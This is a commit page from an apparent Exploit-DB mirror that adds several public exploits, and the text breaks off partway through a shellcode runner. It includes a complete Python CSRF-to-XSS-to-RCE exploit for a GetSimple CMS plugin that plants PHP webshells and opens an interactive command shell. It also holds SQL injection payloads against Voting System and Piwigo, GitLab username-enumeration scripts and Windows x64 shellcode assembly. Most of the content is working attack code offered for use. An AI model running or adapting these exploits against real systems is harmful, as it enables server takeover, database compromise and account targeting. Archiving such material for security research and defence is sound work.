bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-05-04

Browse source 
7 changes to exploits/shellcodes

GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
Voting System 1.0 - Time based SQLI  (Unauthenticated SQL injection)
Piwigo 11.3.0 - 'language' SQL
GitLab Community Edition (CE) 13.10.3 - User Enumeration
GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration

Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
This commit is contained in:
Offensive Security 2021-05-04 05:01:59 +00:00
parent 23c2c2fa04
commit dcd1229758
9 changed files with 923 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

166
exploits/php/webapps/49816.py Executable file
View file

@ -0,0 +1,166 @@
# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
# Date: 30/04/201
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
# Vendor: 4Enzo
# Version: v0.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
# Vulnerability Description:
# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.
# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
def xhrRcePayload():
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var gt = decodeURIComponent("%3c");'
payload += 'var lt = decodeURIComponent("%3e");'
payload += 'var h="application/x-www-form-urlencoded";'
payload += 'var u="/admin/theme-edit.php";'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 && xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector("#nonce").value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open("POST",u,true);'
payload += 'xhr2.setRequestHeader("Content-Type",h);'
payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);'
payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open("GET",u,true);'
payload += 'xhr1.responseType="document";'
payload += 'xhr1.send();'
return payload
def csrfPayload():
payload = '<html><body>'
payload += '<form action="'+target+'/admin/load.php?id=CustomJSPlugin" method="POST">'
payload += '<input type="hidden" name="customjs_url_content" value="">'
payload += '<input type="hidden" name="customjs_js_content" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="submit" value="Save Settings">'
payload += '<input type="submit" value="Submit request">'
payload += '</form></body></html>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{}{} connected to Malicious CSRF Site!".format(ok,victim))
print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def sig():
SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
return SIG
def argsetup():
about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args
if __name__ == '__main__':
header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n'
header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)

171
exploits/php/webapps/49817.txt Normal file
View file

@ -0,0 +1,171 @@
# Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)
# Date: 02/05/2021
# Exploit Author: Syed Sheeraz Ali
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10 20H2 + XAMPP v3.2.4
If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter
Vulnerable code
```
Path :- /votersystem/login.php
<?php
session_start();
include 'includes/conn.php';
if(isset($_POST['login'])){
$voter = $_POST['voter']; <- vulnerable parameter
$password = $_POST['password'];
$sql = "SELECT * FROM voters WHERE voters_id = '$voter'"; <-
Passed unsanitized input
$query = $conn->query($sql);
if($query->num_rows < 1){
$_SESSION['error'] = 'Cannot find voter with the ID';
}
else{
$row = $query->fetch_assoc();
if(password_verify($password, $row['password'])){
$_SESSION['voter'] = $row['id'];
}
else{
$_SESSION['error'] = 'Incorrect password';
}
}
}
else{
$_SESSION['error'] = 'Input voter credentials first';
}
header('location: index.php');
?>
```
Request
```
POST /login.php HTTP/1.1
Host: 10.129.139.200
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.139.200
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://10.129.139.200/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe
Connection: close
voter=as&password=as&login=
```
Sqlmap output
```
python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter
___
__H__
___ ___[)]_____ ___ ___ {1.5.4.7#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:50:56 /2021-05-02/
[07:50:56] [INFO] parsing HTTP request from
'/Users/sheerazali/Documents/wpcve/voter.req'
[07:50:57] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voter (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login=
---
[07:50:57] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[07:51:08] [INFO] confirming MySQL
[07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[07:51:19] [INFO] adjusting time delay to 1 second due to good response times
[07:51:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200'
[*] ending @ 07:51:19 /2021-05-02/
```

60
exploits/php/webapps/49818.py Executable file
View file

@ -0,0 +1,60 @@
# Exploit Title: Piwigo 11.3.0 - 'language' SQL
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.30.2021
# Vendor: https://piwigo.org/
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
# CVE: CVE-2021-27973
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE-2021-27973
from selenium import webdriver
import time
#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/piwigo/"
#enter your login username
username="admin"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="login"
print("Loading... ;)")
time.sleep(1)
browser = webdriver.Chrome()
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Languages Exploit
time.sleep(5)
browser.get(("
http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate"))
print("The payload for category Languages is deployed...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

111
exploits/ruby/webapps/49821.sh Executable file
View file

@ -0,0 +1,111 @@
# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration
# Date: 4/29/2021
# Exploit Author: @4D0niiS [https://github.com/4D0niiS]
# Vendor Homepage: https://gitlab.com/
# Version: 13.10.3
# Tested on: Kali Linux 2021.1
#!/bin/bash
#Colors
RED='\033[38;5;196m'
GREEN='\e[38;5;47m'
NC='\033[0m'
BOLD='\e[1m'
PINK='\e[38;5;198m'
Italic='\e[3m'
BBlue='\e[44m'
YELLOW='\033[0;33m'
clear
echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}"
echo -e " ${BOLD}Version 1.0${NC}\n"
echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n"
echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only"
echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the"
echo -e "right permission is totally on your own risk.\n${NC}"
echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}"
echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo ""
echo ""
# Usage
usage() {
echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url <URL> --userlist <Username Wordlist>${NC}\n"
echo -e "${Italic}PARAMETERS:${NC}"
echo -e "-------------"
echo -e "-u/--url The URL of your victim's GitLab instance"
echo -e "--userlist Path to a username wordlist file (one per line)"
echo -e "-h/--help Show this help message and exit"
echo -e "\n"
echo -e "${Italic}Example:${NC}"
echo -e "-------------"
echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt"
}
#check for params
args=("$@")
URL=""
user_list=""
for (( i=0; i < $#; i++))
{
case ${args[$i]} in
--url | -u)
#GitLab's URL
URL=${args[$((i+1))]}
;;
--userlist)
#Username wordlist
user_list=${args[$((i+1))]}
;;
-h | --help | "")
#Help Menu
usage
exit 0
;;
esac
}
## checking the mandatory parameter (URL)
if [ -z "$URL" ]
then
usage
echo ""
echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}"
exit 0
fi
# User Enumeration Function
enumeration(){
while IFS= read -r line
do
echo "LOOP"
HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line)
echo $HTTP_Code
#echo "\n"
if [ $HTTP_Code -eq 200 ]
then
echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!"
#check the connection
elif [ $HTTP_Code -eq 000 ]
then
echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!"
exit 0
fi
done < "$user_list"
}
# Main
enumeration

82
exploits/ruby/webapps/49822.rb Executable file
View file

@ -0,0 +1,82 @@
# Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration
# Date: 4/29/2021
# Exploit Author: @4D0niiS [https://github.com/4D0niiS]
# Vendor Homepage: https://gitlab.com/
# Version: 13.10.3
# Tested on: Kali Linux 2021.1
INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up].
DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk.
STEPS: The required steps for this purpose are as follows:
1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username
2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow:
----------------------------------------------------------------------------------------------------------------------------------------------------------------
GET /users/testuser/exists HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/users/sign_up
X-CSRF-Token: <some value>
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: experimentation_subject_id=<some value>; known_sign_in=<some value>; _gitlab_session=<some value>
----------------------------------------------------------------------------------------------------------------------------------------------------------------
* note that the tested username (testuser) is in URI
3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter.
4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples:
-------------------------------------------The following response belongs to a valid user ------------------------------------------
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 19 Apr 2021 09:52:44 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: close
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"8063e5a51719c58189c7d5209a5f37b3"
Page-Title: GitLab
Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Gitlab-Feature-Category: users
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F
X-Runtime: 0.221557
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin
{"exists":true}
-------------------------------------------The following response belongs to an invalid user ------------------------------------------
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 19 Apr 2021 09:55:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 16
Connection: close
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"e39f603a5ebcff23859d200f9c9dc20f"
Page-Title: GitLab
Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Gitlab-Feature-Category: users
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0
X-Runtime: 0.033046
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin
{"exists":false}

5
files_exploits.csv
View file

@ -43985,3 +43985,8 @@ id,file,description,date,author,type,platform,port
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php, 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,
49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple, 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,
49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php, 49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php,
49816,exploits/php/webapps/49816.py,"GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE",2021-05-03,boku,webapps,php,
49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",2021-05-03,"Syed Sheeraz Ali",webapps,php,
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -1034,3 +1034,5 @@ id,file,description,date,author,type,platform
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86 49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86 49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64 49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64
49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64

1 id file description date author type platform
1034 49592 shellcodes/windows_x86/49592.asm Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) 2021-02-24 Armando Huesca Prida shellcode windows_x86
1035 49768 shellcodes/linux_x86/49768.c Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) 2021-04-15 s1ege shellcode linux_x86
1036 49770 shellcodes/linux_x86-64/49770.c Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) 2021-04-15 s1ege shellcode linux_x86-64
1037 49819 shellcodes/windows_x86-64/49819.c Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) 2021-05-03 boku shellcode windows_x86-64
1038 49820 shellcodes/windows_x86-64/49820.c Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) 2021-05-03 boku shellcode windows_x86-64

133
shellcodes/windows_x86-64/49819.c Normal file
View file

@ -0,0 +1,133 @@
# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Shellcode Description:
# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method.
# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads.
; Compile & get shellcode from Kali:
; nasm -f win64 popcalc.asm -o popcalc.o
; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
; );
xor rcx, rcx
mul rcx ; RAX & RDX & RCX = 0x0
; calc.exe | String length : 8
push rax ; Null terminate string on stack
mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
not rax
;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
push rax ; RSP = "calc.exe",0x0
mov rcx, rsp ; RCX = "calc.exe",0x0
inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec("calc.exe", SW_HIDE)
###########################################################################################################################################
// runShellcode.c
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
#include <windows.h>
void main() {
void* exec;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Shellcode
unsigned char payload[] =
